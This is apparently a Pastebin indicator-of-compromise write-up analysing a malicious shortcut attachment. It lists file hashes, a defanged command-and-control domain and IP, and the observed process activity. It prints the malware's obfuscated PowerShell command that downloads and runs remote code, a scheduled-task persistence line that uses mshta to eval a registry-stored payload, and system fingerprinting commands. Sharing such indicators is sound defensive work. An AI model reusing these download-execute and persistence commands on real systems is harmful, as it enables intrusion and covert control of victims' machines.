API tools faq
paste
Advertisement
VRad

#ps_b64_070219

VRad
Feb 7th, 2019
1,511
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.57 KB | None | 0 0
raw download clone embed print report
  1. #IOC #OptiData #VR #LNK #powershell #fingerprinting #heavyobfuscated
  2.  
  3. https://pastebin.com/s6ymr2x5
  4.  
  5. attack_vector
  6. --------------
  7. email attach .lnk > powershell > get base64 > decode > fingerprint system
  8.  
  9. email_headers
  10. --------------
  11. n/a
  12.  
  13. files
  14. --------------
  15. SHA-256 18db236b61275f22fc4a02946b6799d881cee985f9e7e8929c6dd9c135894460
  16. File name КМУ база даних.zip [Zip archive data, at least v2.0 to extract]
  17. File size 317.6 KB
  18.  
  19. SHA-256 3d19f49788f531af53f5e0a345cd6812e2f2a581c612e5a702598c5c7170c11b
  20. File name sample.rtf.lnk [MS Windows shortcut, Item id list present, Points to a file or directory]
  21. File size 3.08 KB
  22.  
  23. activity
  24. **************
  25. PL_SC = cdn1186{.} site/zG4roJ
  26.  
  27. C2 = cdn1186{.} site/ua/news
  28.  
  29. netwrk
  30. --------------
  31. 88.85.86.229 cdn1186{.} site GET /zG4roJ HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  32.  
  33. 88.85.86.229 cdn1186{.} site POST /ua/news HTTP/1.1 noUA
  34.  
  35. comp
  36. --------------
  37. powershell.exe 1544 TCP 88.85.86.229 80 ESTABLISHED
  38.  
  39. proc
  40. --------------
  41. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
  42. -NoP -NonI -W hidden -Com "$cx=New-Object -ComObject MsXml2.ServerXmlHttp;$cx.Open('GET','http://cdn1186{.} site/zG4roJ',$False);
  43. $cx.Send();$cx.ResponseText|.( ''.Remove.ToString()[14,50,27]-Join'')
  44.  
  45. C:\Windows\system32\schtasks.exe /create /tn FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0} /sc hourly /mo 2 /tr "MsHTa.EXe 'JaVAsCRIpT:var pata='efada'; var naxe='ifero'; var dhf=new ActiveXObject('\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c');
  46. var GJj=dhf.RegRead('HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso');eval(GJj);close();' "
  47.  
  48. C:\Windows\system32\schtasks.exe /QUERY /FO CSV
  49. C:\Windows\system32\cmd.exe /c chcp 866 & SYSTEMINFO /FO CSV /NH 2>&1
  50. C:\Windows\system32\chcp.com
  51. C:\Windows\system32\systeminfo.exe /FO CSV /NH
  52.  
  53. persist
  54. --------------
  55. Task Scheduler
  56. \FamilySafetyMonitor-{13f45184-7396-4dff-9da2-b98f92b1d2d0}
  57. Microsoft (R) HTML Application host
  58. Microsoft Corporation c:\windows\syswow64\mshta.exe 14.10.2013 7:50
  59.  
  60. "MsHTa.EXe" "JaVAsCRIpT:var pata="efada"; var naxe="ifero";
  61. var dhf=new ActiveXObject("\x77\x53\x43\x52\x69\x50\x54\x2e\x53\x48\x65\x6c\x4c");
  62. var GJj=dhf.RegRead("HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\EventSystem\\{l1k}\\Igoso");eval(GJj);close();"
  63.  
  64. drop
  65. --------------
  66. n/a
  67.  
  68. # # #
  69. https://www.virustotal.com/#/file/18db236b61275f22fc4a02946b6799d881cee985f9e7e8929c6dd9c135894460/details
  70. https://www.virustotal.com/#/file/3d19f49788f531af53f5e0a345cd6812e2f2a581c612e5a702598c5c7170c11b/details
  71.  
  72. VR
  73.  
  74. @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!